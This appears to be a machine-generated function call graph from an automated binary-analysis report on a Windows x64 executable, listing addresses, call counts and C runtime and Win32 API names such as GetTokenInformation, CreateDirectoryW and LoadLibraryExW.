17487->17445 17488->17487 17497 7ff7ca7a1074 38 API calls 17489->17497 17493 7ff7ca7a2d40 17490->17493 17494 7ff7ca7a2d11 17490->17494 17498 7ff7ca7a2de7 17491->17498 17500 7ff7ca7a2dda 17491->17500 17504 7ff7ca7a2ddf 17491->17504 17495 7ff7ca7a2db1 17492->17495 17496 7ff7ca7a2d7e 17492->17496 17501 7ff7ca7a2d17 17493->17501 17493->17504 17494->17498 17494->17501 17502 7ff7ca7a0c64 38 API calls 17495->17502 17499 7ff7ca7a2d20 17496->17499 17507 7ff7ca7a2d8d 17496->17507 17514 7ff7ca7a2d3b 17497->17514 17505 7ff7ca7a39cc 45 API calls 17498->17505 17503 7ff7ca7a3478 47 API calls 17499->17503 17517 7ff7ca7a2e10 17499->17517 17500->17489 17500->17504 17501->17499 17508 7ff7ca7a2d52 17501->17508 17501->17514 17502->17514 17503->17514 17506 7ff7ca7a1484 38 API calls 17504->17506 17504->17517 17505->17514 17506->17514 17507->17489 17510 7ff7ca7a2d92 17507->17510 17509 7ff7ca7a37b4 46 API calls 17508->17509 17508->17517 17509->17514 17512 7ff7ca7a3878 37 API calls 17510->17512 17510->17517 17511 7ff7ca79b870 _log10_special 8 API calls 17513 7ff7ca7a310a 17511->17513 17512->17514 17513->17445 17515 7ff7ca7a3ae0 45 API calls 17514->17515 17514->17517 17518 7ff7ca7a2ffc 17514->17518 17515->17518 17516 7ff7ca7add18 46 API calls 17516->17518 17517->17511 17518->17516 17518->17517 17739 7ff7ca7a02e8 17519->17739 17523 7ff7ca7a349e 17522->17523 17585 7ff7ca79fea0 17523->17585 17528 7ff7ca7a3ae0 45 API calls 17530 7ff7ca7a35e3 17528->17530 17529 7ff7ca7a3ae0 45 API calls 17531 7ff7ca7a3671 17529->17531 17530->17529 17530->17530 17530->17531 17531->17479 17534 7ff7ca7a37e9 17532->17534 17533 7ff7ca7a382e 17533->17479 17534->17533 17535 7ff7ca7a3807 17534->17535 17536 7ff7ca7a3ae0 45 API calls 17534->17536 17537 7ff7ca7add18 46 API calls 17535->17537 17536->17535 17537->17533 17541 7ff7ca7a3899 17538->17541 17539 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17540 7ff7ca7a38ca 17539->17540 17540->17479 17541->17539 17541->17540 17543 7ff7ca7a10a7 17542->17543 17544 7ff7ca7a10d6 17543->17544 17546 7ff7ca7a1193 17543->17546 17548 7ff7ca7a1113 17544->17548 17712 7ff7ca79ff48 17544->17712 17547 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17546->17547 17547->17548 17548->17479 17550 7ff7ca7a0c97 17549->17550 17551 7ff7ca7a0cc6 17550->17551 17553 7ff7ca7a0d83 17550->17553 17552 7ff7ca79ff48 12 API calls 17551->17552 17555 7ff7ca7a0d03 17551->17555 17552->17555 17554 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17553->17554 17554->17555 17555->17479 17557 7ff7ca7a3a0f 17556->17557 17559 7ff7ca7a3a13 __crtLCMapStringW 17557->17559 17720 7ff7ca7a3a68 17557->17720 17559->17479 17563 7ff7ca7a14b7 17560->17563 17561 7ff7ca7a14e6 17562 7ff7ca79ff48 12 API calls 17561->17562 17566 7ff7ca7a1523 17561->17566 17562->17566 17563->17561 17564 7ff7ca7a15a3 17563->17564 17565 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17564->17565 17565->17566 17566->17479 17568 7ff7ca7a3af7 17567->17568 17724 7ff7ca7accc8 17568->17724 17574 7ff7ca7add49 17573->17574 17582 7ff7ca7add57 17573->17582 17575 7ff7ca7add77 17574->17575 17576 7ff7ca7a3ae0 45 API calls 17574->17576 17574->17582 17577 7ff7ca7addaf 17575->17577 17578 7ff7ca7add88 17575->17578 17576->17575 17580 7ff7ca7addd9 17577->17580 17581 7ff7ca7ade3a 17577->17581 17577->17582 17732 7ff7ca7af3b0 17578->17732 17580->17582 17584 7ff7ca7aebb0 _fread_nolock MultiByteToWideChar 17580->17584 17583 7ff7ca7aebb0 _fread_nolock MultiByteToWideChar 17581->17583 17582->17477 17583->17582 17584->17582 17586 7ff7ca79fec6 17585->17586 17587 7ff7ca79fed7 17585->17587 17593 7ff7ca7ad880 17586->17593 17587->17586 17588 7ff7ca7ac90c _fread_nolock 12 API calls 17587->17588 17589 7ff7ca79ff04 17588->17589 17590 7ff7ca79ff18 17589->17590 17591 7ff7ca7a9c58 __free_lconv_mon 11 API calls 17589->17591 17592 7ff7ca7a9c58 __free_lconv_mon 11 API calls 17590->17592 17591->17590 17592->17586 17594 7ff7ca7ad89d 17593->17594 17595 7ff7ca7ad8d0 17593->17595 17596 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17594->17596 17595->17594 17597 7ff7ca7ad902 17595->17597 17605 7ff7ca7a35c1 17596->17605 17601 7ff7ca7ada15 17597->17601 17610 7ff7ca7ad94a 17597->17610 17598 7ff7ca7adb07 17639 7ff7ca7acd6c 17598->17639 17600 7ff7ca7adacd 17632 7ff7ca7ad104 17600->17632 17601->17598 17601->17600 17602 7ff7ca7ada9c 17601->17602 17604 7ff7ca7ada5f 17601->17604 17607 7ff7ca7ada55 17601->17607 17625 7ff7ca7ad3e4 17602->17625 17615 7ff7ca7ad614 17604->17615 17605->17528 17605->17530 17607->17600 17609 7ff7ca7ada5a 17607->17609 17609->17602 17609->17604 17610->17605 17611 7ff7ca7a97b4 __std_exception_copy 37 API calls 17610->17611 17612 7ff7ca7ada02 17611->17612 17612->17605 17613 7ff7ca7a9c10 _isindst 17 API calls 17612->17613 17614 7ff7ca7adb64 17613->17614 17648 7ff7ca7b33bc 17615->17648 17619 7ff7ca7ad6bc 17620 7ff7ca7ad711 17619->17620 17622 7ff7ca7ad6dc 17619->17622 17624 7ff7ca7ad6c0 17619->17624 17701 7ff7ca7ad200 17620->17701 17697 7ff7ca7ad4bc 17622->17697 17624->17605 17626 7ff7ca7b33bc 38 API calls 17625->17626 17627 7ff7ca7ad42e 17626->17627 17628 7ff7ca7b2e04 37 API calls 17627->17628 17629 7ff7ca7ad47e 17628->17629 17630 7ff7ca7ad482 17629->17630 17631 7ff7ca7ad4bc 45 API calls 17629->17631 17630->17605 17631->17630 17633 7ff7ca7b33bc 38 API calls 17632->17633 17634 7ff7ca7ad14f 17633->17634 17635 7ff7ca7b2e04 37 API calls 17634->17635 17636 7ff7ca7ad1a7 17635->17636 17637 7ff7ca7ad1ab 17636->17637 17638 7ff7ca7ad200 45 API calls 17636->17638 17637->17605 17638->17637 17640 7ff7ca7acdb1 17639->17640 17641 7ff7ca7acde4 17639->17641 17642 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17640->17642 17643 7ff7ca7acdfc 17641->17643 17645 7ff7ca7ace7d 17641->17645 17647 7ff7ca7acddd __scrt_get_show_window_mode 17642->17647 17644 7ff7ca7ad104 46 API calls 17643->17644 17644->17647 17646 7ff7ca7a3ae0 45 API calls 17645->17646 17645->17647 17646->17647 17647->17605 17649 7ff7ca7b340f fegetenv 17648->17649 17650 7ff7ca7b713c 37 API calls 17649->17650 17656 7ff7ca7b3462 17650->17656 17651 7ff7ca7b348f 17655 7ff7ca7a97b4 __std_exception_copy 37 API calls 17651->17655 17652 7ff7ca7b3552 17653 7ff7ca7b713c 37 API calls 17652->17653 17654 7ff7ca7b357c 17653->17654 17659 7ff7ca7b713c 37 API calls 17654->17659 17660 7ff7ca7b350d 17655->17660 17656->17652 17657 7ff7ca7b347d 17656->17657 17658 7ff7ca7b352c 17656->17658 17657->17651 17657->17652 17663 7ff7ca7a97b4 __std_exception_copy 37 API calls 17658->17663 17661 7ff7ca7b358d 17659->17661 17662 7ff7ca7b4634 17660->17662 17667 7ff7ca7b3515 17660->17667 17664 7ff7ca7b7330 20 API calls 17661->17664 17665 7ff7ca7a9c10 _isindst 17 API calls 17662->17665 17663->17660 17675 7ff7ca7b35f6 __scrt_get_show_window_mode 17664->17675 17666 7ff7ca7b4649 17665->17666 17668 7ff7ca79b870 _log10_special 8 API calls 17667->17668 17669 7ff7ca7ad661 17668->17669 17693 7ff7ca7b2e04 17669->17693 17670 7ff7ca7b399f __scrt_get_show_window_mode 17671 7ff7ca7b3cdf 17672 7ff7ca7b2f20 37 API calls 17671->17672 17679 7ff7ca7b43f7 17672->17679 17673 7ff7ca7b3c8b 17673->17671 17676 7ff7ca7b464c memcpy_s 37 API calls 17673->17676 17674 7ff7ca7b3637 memcpy_s 17689 7ff7ca7b3a93 memcpy_s __scrt_get_show_window_mode 17674->17689 17690 7ff7ca7b3f7b memcpy_s __scrt_get_show_window_mode 17674->17690 17675->17670 17675->17674 17677 7ff7ca7a43f4 _get_daylight 11 API calls 17675->17677 17676->17671 17678 7ff7ca7b3a70 17677->17678 17680 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 17678->17680 17681 7ff7ca7b464c memcpy_s 37 API calls 17679->17681 17685 7ff7ca7b4452 17679->17685 17680->17674 17681->17685 17682 7ff7ca7b45d8 17684 7ff7ca7b713c 37 API calls 17682->17684 17683 7ff7ca7a43f4 11 API calls _get_daylight 17683->17689 17684->17667 17685->17682 17687 7ff7ca7b2f20 37 API calls 17685->17687 17691 7ff7ca7b464c memcpy_s 37 API calls 17685->17691 17686 7ff7ca7a43f4 11 API calls _get_daylight 17686->17690 17687->17685 17688 7ff7ca7a9bf0 37 API calls _invalid_parameter_noinfo 17688->17689 17689->17673 17689->17683 17689->17688 17690->17671 17690->17673 17690->17686 17692 7ff7ca7a9bf0 37 API calls _invalid_parameter_noinfo 17690->17692 17691->17685 17692->17690 17694 7ff7ca7b2e23 17693->17694 17695 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17694->17695 17696 7ff7ca7b2e4e memcpy_s 17694->17696 17695->17696 17696->17619 17698 7ff7ca7ad4e8 memcpy_s 17697->17698 17699 7ff7ca7a3ae0 45 API calls 17698->17699 17700 7ff7ca7ad5a2 memcpy_s __scrt_get_show_window_mode 17698->17700 17699->17700 17700->17624 17702 7ff7ca7ad23b 17701->17702 17706 7ff7ca7ad288 memcpy_s 17701->17706 17703 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17702->17703 17704 7ff7ca7ad267 17703->17704 17704->17624 17705 7ff7ca7ad2f3 17707 7ff7ca7a97b4 __std_exception_copy 37 API calls 17705->17707 17706->17705 17708 7ff7ca7a3ae0 45 API calls 17706->17708 17711 7ff7ca7ad335 memcpy_s 17707->17711 17708->17705 17709 7ff7ca7a9c10 _isindst 17 API calls 17710 7ff7ca7ad3e0 17709->17710 17711->17709 17713 7ff7ca79ff7f 17712->17713 17719 7ff7ca79ff6e 17712->17719 17714 7ff7ca7ac90c _fread_nolock 12 API calls 17713->17714 17713->17719 17716 7ff7ca79ffb0 17714->17716 17715 7ff7ca79ffc4 17718 7ff7ca7a9c58 __free_lconv_mon 11 API calls 17715->17718 17716->17715 17717 7ff7ca7a9c58 __free_lconv_mon 11 API calls 17716->17717 17717->17715 17718->17719 17719->17548 17721 7ff7ca7a3a86 17720->17721 17722 7ff7ca7a3a8e 17720->17722 17723 7ff7ca7a3ae0 45 API calls 17721->17723 17722->17559 17723->17722 17725 7ff7ca7acce1 17724->17725 17727 7ff7ca7a3b1f 17724->17727 17726 7ff7ca7b2614 45 API calls 17725->17726 17725->17727 17726->17727 17728 7ff7ca7acd34 17727->17728 17729 7ff7ca7acd4d 17728->17729 17731 7ff7ca7a3b2f 17728->17731 17730 7ff7ca7b1960 45 API calls 17729->17730 17729->17731 17730->17731 17731->17477 17735 7ff7ca7b6098 17732->17735 17738 7ff7ca7b60fc 17735->17738 17736 7ff7ca79b870 _log10_special 8 API calls 17737 7ff7ca7af3cd 17736->17737 17737->17582 17738->17736 17740 7ff7ca7a032f 17739->17740 17741 7ff7ca7a031d 17739->17741 17743 7ff7ca7a033d 17740->17743 17748 7ff7ca7a0379 17740->17748 17742 7ff7ca7a43f4 _get_daylight 11 API calls 17741->17742 17744 7ff7ca7a0322 17742->17744 17745 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17743->17745 17746 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 17744->17746 17753 7ff7ca7a032d 17745->17753 17746->17753 17747 7ff7ca7a06f5 17749 7ff7ca7a43f4 _get_daylight 11 API calls 17747->17749 17747->17753 17748->17747 17750 7ff7ca7a43f4 _get_daylight 11 API calls 17748->17750 17751 7ff7ca7a0989 17749->17751 17752 7ff7ca7a06ea 17750->17752 17754 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 17751->17754 17755 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 17752->17755 17753->17445 17754->17753 17755->17747 17757 7ff7ca79fa24 17756->17757 17786 7ff7ca79f784 17757->17786 17759 7ff7ca79fa3d 17759->17121 17798 7ff7ca79f6dc 17760->17798 17764 7ff7ca79277c 17763->17764 17765 7ff7ca7a43f4 _get_daylight 11 API calls 17764->17765 17766 7ff7ca792799 17765->17766 17812 7ff7ca7a3ca4 17766->17812 17771 7ff7ca791bf0 49 API calls 17772 7ff7ca792807 17771->17772 17773 7ff7ca7986b0 2 API calls 17772->17773 17774 7ff7ca79281f 17773->17774 17775 7ff7ca792843 MessageBoxA 17774->17775 17776 7ff7ca79282c MessageBoxW 17774->17776 17777 7ff7ca792855 17775->17777 17776->17777 17778 7ff7ca79b870 _log10_special 8 API calls 17777->17778 17779 7ff7ca792865 17778->17779 17779->17150 17781 7ff7ca79f439 17780->17781 17782 7ff7ca791b06 17780->17782 17783 7ff7ca7a43f4 _get_daylight 11 API calls 17781->17783 17782->17149 17782->17150 17784 7ff7ca79f43e 17783->17784 17785 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 17784->17785 17785->17782 17787 7ff7ca79f7ee 17786->17787 17788 7ff7ca79f7ae 17786->17788 17787->17788 17790 7ff7ca79f7fa 17787->17790 17789 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17788->17789 17796 7ff7ca79f7d5 17789->17796 17797 7ff7ca7a477c EnterCriticalSection 17790->17797 17796->17759 17799 7ff7ca79f706 17798->17799 17800 7ff7ca7919b9 17798->17800 17799->17800 17801 7ff7ca79f752 17799->17801 17802 7ff7ca79f715 __scrt_get_show_window_mode 17799->17802 17800->17127 17800->17128 17811 7ff7ca7a477c EnterCriticalSection 17801->17811 17805 7ff7ca7a43f4 _get_daylight 11 API calls 17802->17805 17807 7ff7ca79f72a 17805->17807 17808 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 17807->17808 17808->17800 17814 7ff7ca7a3cfe 17812->17814 17813 7ff7ca7a3d23 17815 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17813->17815 17814->17813 17816 7ff7ca7a3d5f 17814->17816 17818 7ff7ca7a3d4d 17815->17818 17842 7ff7ca7a1f30 17816->17842 17820 7ff7ca79b870 _log10_special 8 API calls 17818->17820 17819 7ff7ca7a3e3c 17821 7ff7ca7a9c58 __free_lconv_mon 11 API calls 17819->17821 17822 7ff7ca7927d8 17820->17822 17821->17818 17830 7ff7ca7a4480 17822->17830 17824 7ff7ca7a3e11 17826 7ff7ca7a9c58 __free_lconv_mon 11 API calls 17824->17826 17825 7ff7ca7a3e60 17825->17819 17828 7ff7ca7a3e6a 17825->17828 17826->17818 17827 7ff7ca7a3e08 17827->17819 17827->17824 17829 7ff7ca7a9c58 __free_lconv_mon 11 API calls 17828->17829 17829->17818 17831 7ff7ca7aa5d8 _get_daylight 11 API calls 17830->17831 17832 7ff7ca7a4497 17831->17832 17833 7ff7ca7927df 17832->17833 17834 7ff7ca7adea8 _get_daylight 11 API calls 17832->17834 17837 7ff7ca7a44d7 17832->17837 17833->17771 17835 7ff7ca7a44cc 17834->17835 17836 7ff7ca7a9c58 __free_lconv_mon 11 API calls 17835->17836 17836->17837 17837->17833 17977 7ff7ca7adf30 17837->17977 17840 7ff7ca7a9c10 _isindst 17 API calls 17841 7ff7ca7a451c 17840->17841 17843 7ff7ca7a1f6e 17842->17843 17844 7ff7ca7a1f5e 17842->17844 17845 7ff7ca7a1f77 17843->17845 17853 7ff7ca7a1fa5 17843->17853 17846 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17844->17846 17847 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17845->17847 17848 7ff7ca7a1f9d 17846->17848 17847->17848 17848->17819 17848->17824 17848->17825 17848->17827 17849 7ff7ca7a3ae0 45 API calls 17849->17853 17851 7ff7ca7a2254 17852 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17851->17852 17852->17844 17853->17844 17853->17848 17853->17849 17853->17851 17856 7ff7ca7a28c0 17853->17856 17882 7ff7ca7a2588 17853->17882 17912 7ff7ca7a1e10 17853->17912 17857 7ff7ca7a2902 17856->17857 17858 7ff7ca7a2975 17856->17858 17859 7ff7ca7a299f 17857->17859 17860 7ff7ca7a2908 17857->17860 17861 7ff7ca7a29cf 17858->17861 17862 7ff7ca7a297a 17858->17862 17929 7ff7ca7a0e70 17859->17929 17865 7ff7ca7a29de 17860->17865 17868 7ff7ca7a290d 17860->17868 17861->17859 17861->17865 17880 7ff7ca7a2938 17861->17880 17863 7ff7ca7a29af 17862->17863 17864 7ff7ca7a297c 17862->17864 17936 7ff7ca7a0a60 17863->17936 17870 7ff7ca7a298b 17864->17870 17873 7ff7ca7a291d 17864->17873 17881 7ff7ca7a2a0d 17865->17881 17943 7ff7ca7a1280 17865->17943 17871 7ff7ca7a2950 17868->17871 17868->17873 17868->17880 17870->17859 17874 7ff7ca7a2990 17870->17874 17871->17881 17925 7ff7ca7a36e0 17871->17925 17873->17881 17915 7ff7ca7a3224 17873->17915 17877 7ff7ca7a3878 37 API calls 17874->17877 17874->17881 17876 7ff7ca79b870 _log10_special 8 API calls 17878 7ff7ca7a2ca3 17876->17878 17877->17880 17878->17853 17880->17881 17950 7ff7ca7adb68 17880->17950 17881->17876 17883 7ff7ca7a2593 17882->17883 17884 7ff7ca7a25a9 17882->17884 17886 7ff7ca7a2902 17883->17886 17887 7ff7ca7a2975 17883->17887 17902 7ff7ca7a25e7 17883->17902 17885 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17884->17885 17884->17902 17885->17902 17888 7ff7ca7a299f 17886->17888 17889 7ff7ca7a2908 17886->17889 17890 7ff7ca7a297a 17887->17890 17893 7ff7ca7a29cf 17887->17893 17894 7ff7ca7a0e70 38 API calls 17888->17894 17895 7ff7ca7a290d 17889->17895 17898 7ff7ca7a29de 17889->17898 17892 7ff7ca7a297c 17890->17892 17896 7ff7ca7a29af 17890->17896 17891 7ff7ca7a291d 17897 7ff7ca7a3224 47 API calls 17891->17897 17911 7ff7ca7a2a0d 17891->17911 17892->17891 17903 7ff7ca7a298b 17892->17903 17893->17888 17893->17898 17910 7ff7ca7a2938 17893->17910 17894->17910 17895->17891 17900 7ff7ca7a2950 17895->17900 17895->17910 17899 7ff7ca7a0a60 38 API calls 17896->17899 17897->17910 17901 7ff7ca7a1280 38 API calls 17898->17901 17898->17911 17899->17910 17904 7ff7ca7a36e0 47 API calls 17900->17904 17900->17911 17901->17910 17902->17853 17903->17888 17905 7ff7ca7a2990 17903->17905 17904->17910 17907 7ff7ca7a3878 37 API calls 17905->17907 17905->17911 17906 7ff7ca79b870 _log10_special 8 API calls 17908 7ff7ca7a2ca3 17906->17908 17907->17910 17908->17853 17909 7ff7ca7adb68 47 API calls 17909->17910 17910->17909 17910->17911 17911->17906 17960 7ff7ca7a0034 17912->17960 17916 7ff7ca7a3246 17915->17916 17917 7ff7ca79fea0 12 API calls 17916->17917 17918 7ff7ca7a328e 17917->17918 17919 7ff7ca7ad880 46 API calls 17918->17919 17920 7ff7ca7a3361 17919->17920 17921 7ff7ca7a3ae0 45 API calls 17920->17921 17924 7ff7ca7a3383 17920->17924 17921->17924 17922 7ff7ca7a340c 17922->17880 17922->17922 17923 7ff7ca7a3ae0 45 API calls 17923->17922 17924->17922 17924->17923 17924->17924 17926 7ff7ca7a36f8 17925->17926 17928 7ff7ca7a3760 17925->17928 17927 7ff7ca7adb68 47 API calls 17926->17927 17926->17928 17927->17928 17928->17880 17930 7ff7ca7a0ea3 17929->17930 17931 7ff7ca7a0ed2 17930->17931 17933 7ff7ca7a0f8f 17930->17933 17932 7ff7ca79fea0 12 API calls 17931->17932 17935 7ff7ca7a0f0f 17931->17935 17932->17935 17934 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17933->17934 17934->17935 17935->17880 17937 7ff7ca7a0a93 17936->17937 17938 7ff7ca7a0ac2 17937->17938 17940 7ff7ca7a0b7f 17937->17940 17939 7ff7ca79fea0 12 API calls 17938->17939 17942 7ff7ca7a0aff 17938->17942 17939->17942 17941 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17940->17941 17941->17942 17942->17880 17944 7ff7ca7a12b3 17943->17944 17945 7ff7ca7a12e2 17944->17945 17947 7ff7ca7a139f 17944->17947 17946 7ff7ca79fea0 12 API calls 17945->17946 17949 7ff7ca7a131f 17945->17949 17946->17949 17948 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17947->17948 17948->17949 17949->17880 17951 7ff7ca7adb90 17950->17951 17952 7ff7ca7adbd5 17951->17952 17954 7ff7ca7a3ae0 45 API calls 17951->17954 17955 7ff7ca7adbbe __scrt_get_show_window_mode 17951->17955 17958 7ff7ca7adb95 __scrt_get_show_window_mode 17951->17958 17952->17955 17956 7ff7ca7afaf8 WideCharToMultiByte 17952->17956 17952->17958 17953 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17953->17958 17954->17952 17955->17953 17955->17958 17957 7ff7ca7adcb1 17956->17957 17957->17958 17959 7ff7ca7adcc6 GetLastError 17957->17959 17958->17880 17959->17955 17959->17958 17961 7ff7ca7a0061 17960->17961 17962 7ff7ca7a0073 17960->17962 17963 7ff7ca7a43f4 _get_daylight 11 API calls 17961->17963 17965 7ff7ca7a0080 17962->17965 17968 7ff7ca7a00bd 17962->17968 17964 7ff7ca7a0066 17963->17964 17966 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 17964->17966 17967 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17965->17967 17973 7ff7ca7a0071 17966->17973 17967->17973 17969 7ff7ca7a0166 17968->17969 17971 7ff7ca7a43f4 _get_daylight 11 API calls 17968->17971 17970 7ff7ca7a43f4 _get_daylight 11 API calls 17969->17970 17969->17973 17972 7ff7ca7a0210 17970->17972 17974 7ff7ca7a015b 17971->17974 17975 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 17972->17975 17973->17853 17976 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 17974->17976 17975->17973 17976->17969 17980 7ff7ca7adf4d 17977->17980 17978 7ff7ca7adf52 17979 7ff7ca7a43f4 _get_daylight 11 API calls 17978->17979 17983 7ff7ca7a44fd 17978->17983 17985 7ff7ca7adf5c 17979->17985 17980->17978 17981 7ff7ca7adf9c 17980->17981 17980->17983 17981->17983 17984 7ff7ca7a43f4 _get_daylight 11 API calls 17981->17984 17982 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 17982->17983 17983->17833 17983->17840 17984->17985 17985->17982 17987 7ff7ca7a7555 17986->17987 17988 7ff7ca7a7568 17986->17988 17989 7ff7ca7a43f4 _get_daylight 11 API calls 17987->17989 17996 7ff7ca7a71cc 17988->17996 17991 7ff7ca7a755a 17989->17991 17993 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 17991->17993 17994 7ff7ca7a7566 17993->17994 17994->17168 18003 7ff7ca7af5e8 EnterCriticalSection 17996->18003 18005 7ff7ca797b91 GetTokenInformation 18004->18005 18006 7ff7ca797c13 __std_exception_copy 18004->18006 18007 7ff7ca797bb2 GetLastError 18005->18007 18008 7ff7ca797bbd 18005->18008 18009 7ff7ca797c26 CloseHandle 18006->18009 18010 7ff7ca797c2c 18006->18010 18007->18006 18007->18008 18008->18006 18011 7ff7ca797bd9 GetTokenInformation 18008->18011 18009->18010 18010->17177 18011->18006 18012 7ff7ca797bfc 18011->18012 18012->18006 18013 7ff7ca797c06 ConvertSidToStringSidW 18012->18013 18013->18006 18190 7ff7ca793f70 108 API calls 18189->18190 18191 7ff7ca791463 18190->18191 18192 7ff7ca79146b 18191->18192 18193 7ff7ca79148c 18191->18193 18194 7ff7ca7925f0 53 API calls 18192->18194 18195 7ff7ca79f9f4 73 API calls 18193->18195 18196 7ff7ca79147b 18194->18196 18197 7ff7ca7914a1 18195->18197 18196->17237 18198 7ff7ca7914c1 18197->18198 18199 7ff7ca7914a5 18197->18199 18201 7ff7ca7914f1 18198->18201 18202 7ff7ca7914d1 18198->18202 18200 7ff7ca792760 53 API calls 18199->18200 18208 7ff7ca7914bc __std_exception_copy 18200->18208 18205 7ff7ca7914f7 18201->18205 18210 7ff7ca79150a 18201->18210 18203 7ff7ca792760 53 API calls 18202->18203 18203->18208 18204 7ff7ca79f36c 74 API calls 18206 7ff7ca791584 18204->18206 18213 7ff7ca7911f0 18205->18213 18206->17237 18208->18204 18209 7ff7ca79f6bc _fread_nolock 53 API calls 18209->18210 18210->18208 18210->18209 18211 7ff7ca791596 18210->18211 18212 7ff7ca792760 53 API calls 18211->18212 18212->18208 18214 7ff7ca791248 18213->18214 18215 7ff7ca79124f 18214->18215 18216 7ff7ca791277 18214->18216 18251 7ff7ca793f1a 18250->18251 18252 7ff7ca7986b0 2 API calls 18251->18252 18253 7ff7ca793f3f 18252->18253 18254 7ff7ca79b870 _log10_special 8 API calls 18253->18254 18255 7ff7ca793f67 18254->18255 18255->17261 18257 7ff7ca79753e 18256->18257 18258 7ff7ca791bf0 49 API calls 18257->18258 18259 7ff7ca797662 18257->18259 18265 7ff7ca7975c5 18258->18265 18260 7ff7ca79b870 _log10_special 8 API calls 18259->18260 18261 7ff7ca797693 18260->18261 18261->17261 18262 7ff7ca791bf0 49 API calls 18262->18265 18263 7ff7ca793f10 10 API calls 18263->18265 18264 7ff7ca79761b 18266 7ff7ca7986b0 2 API calls 18264->18266 18265->18259 18265->18262 18265->18263 18265->18264 18267 7ff7ca797633 CreateDirectoryW 18266->18267 18267->18259 18267->18265 18269 7ff7ca7915d3 18268->18269 18270 7ff7ca7915f7 18268->18270 18357 7ff7ca791050 18269->18357 18271 7ff7ca793f70 108 API calls 18270->18271 18273 7ff7ca79160b 18271->18273 18275 7ff7ca791613 18273->18275 18276 7ff7ca79163b 18273->18276 18278 7ff7ca792760 53 API calls 18275->18278 18279 7ff7ca793f70 108 API calls 18276->18279 18281 7ff7ca79162a 18278->18281 18282 7ff7ca79164f 18279->18282 18281->17261 18307 7ff7ca79694b 18306->18307 18309 7ff7ca796904 18306->18309 18307->17261 18309->18307 18396 7ff7ca7a4250 18309->18396 18311 7ff7ca793b51 18310->18311 18312 7ff7ca793e90 49 API calls 18311->18312 18313 7ff7ca793b8b 18312->18313 18314 7ff7ca793e90 49 API calls 18313->18314 18315 7ff7ca793b9b 18314->18315 18316 7ff7ca793bec 18315->18316 18317 7ff7ca793bbd 18315->18317 18318 7ff7ca793ac0 51 API calls 18316->18318 18411 7ff7ca793ac0 18317->18411 18355 7ff7ca791bf0 49 API calls 18354->18355 18356 7ff7ca793e24 18355->18356 18356->17261 18358 7ff7ca793f70 108 API calls 18357->18358 18359 7ff7ca79108b 18358->18359 18360 7ff7ca791093 18359->18360 18361 7ff7ca7910a8 18359->18361 18362 7ff7ca7925f0 53 API calls 18360->18362 18363 7ff7ca79f9f4 73 API calls 18361->18363 18397 7ff7ca7a428a 18396->18397 18398 7ff7ca7a425d 18396->18398 18400 7ff7ca7a42ad 18397->18400 18404 7ff7ca7a42c9 18397->18404 18399 7ff7ca7a43f4 _get_daylight 11 API calls 18398->18399 18402 7ff7ca7a4214 18398->18402 18401 7ff7ca7a4267 18399->18401 18403 7ff7ca7a43f4 _get_daylight 11 API calls 18400->18403 18406 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 18401->18406 18402->18309 18407 7ff7ca7a42b2 18403->18407 18405 7ff7ca7a4178 45 API calls 18404->18405 18410 7ff7ca7a42bd 18405->18410 18408 7ff7ca7a4272 18406->18408 18408->18309 18410->18309 18476 7ff7ca7a51d8 18474->18476 18475 7ff7ca7a51fe 18477 7ff7ca7a43f4 _get_daylight 11 API calls 18475->18477 18476->18475 18479 7ff7ca7a5231 18476->18479 18478 7ff7ca7a5203 18477->18478 18480 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 18478->18480 18481 7ff7ca7a5244 18479->18481 18482 7ff7ca7a5237 18479->18482 18483 7ff7ca793fc6 18480->18483 18493 7ff7ca7a9f38 18481->18493 18484 7ff7ca7a43f4 _get_daylight 11 API calls 18482->18484 18483->17288 18484->18483 18506 7ff7ca7af5e8 EnterCriticalSection 18493->18506 18866 7ff7ca7a6c08 18865->18866 18869 7ff7ca7a66e4 18866->18869 18868 7ff7ca7a6c21 18868->17298 18870 7ff7ca7a66ff 18869->18870 18871 7ff7ca7a672e 18869->18871 18873 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 18870->18873 18879 7ff7ca7a477c EnterCriticalSection 18871->18879 18875 7ff7ca7a671f 18873->18875 18875->18868 18881 7ff7ca79f191 18880->18881 18882 7ff7ca79f163 18880->18882 18889 7ff7ca79f183 18881->18889 18890 7ff7ca7a477c EnterCriticalSection 18881->18890 18883 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 18882->18883 18883->18889 18889->17302 18892 7ff7ca7986b0 2 API calls 18891->18892 18893 7ff7ca7981b4 LoadLibraryExW 18892->18893 18894 7ff7ca7981d3 __std_exception_copy 18893->18894 